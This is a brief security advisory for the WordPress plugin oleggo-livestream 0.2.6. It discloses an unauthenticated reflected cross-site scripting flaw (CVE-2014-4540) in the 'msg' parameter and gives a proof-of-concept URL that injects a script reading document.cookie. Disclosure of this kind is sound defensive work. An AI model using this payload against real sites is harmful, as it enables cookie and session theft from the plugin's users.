wp-plugin : oleggo-livestream

Plugin Details
Plugin Name: wp-plugin : oleggo-livestream
Effected Version : 0.2.6 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

PoC:http://localhost/wordpress/wp-content/wp-plugs/oleggolivestream/oleggo-twitter/twitter_login_form.php?msg=msg%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : msg


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4540
Plugin Description :
[| Oleggo LiveStream is a wordpress plugin that integrates video streaming, twitter and facebook to improve your streaming events. Oleggo LiveStream can manage video streaming (from youtube, vimeo, ustream or whatever you want), plus you can add twitter hashtags search and facebook live streaming. Using these services you can create a great livestreaming event page. ]